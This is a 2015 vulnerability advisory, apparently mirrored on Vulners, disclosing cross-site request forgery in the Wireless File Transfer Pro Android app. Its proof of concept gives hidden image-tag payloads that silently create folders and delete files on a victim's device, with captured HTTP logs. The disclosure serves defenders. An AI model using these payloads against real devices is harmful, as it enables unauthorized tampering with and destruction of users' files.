Vulners
Lucene search
Wireless File Transfer Pro 1.0.1 CSRF
`
Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete)
Release Date:
=============
2015-02-10
Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )
Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Request Method(s):
[+] [GET]
Vulnerable Module(s):
[+] browse
Vulnerable Parameter(s):
[+] fileExplorer.html?
Affected Module(s):
[+] Index of Documents (http://localhost:8888)
Technical Details & Description:
================================
cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.
Proof of Concept (PoC):
=======================
Creat New Folder
<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">
--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive
HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4
<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">
Delete File, Folder
<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0">
--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive
HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30
Reference:
http://localhost:8888/
Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)
Credits & Authors:
==================
Hadji Samir [email protected]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Feb 2015 00:00Current
0.4Low risk
Vulners AI Score0.4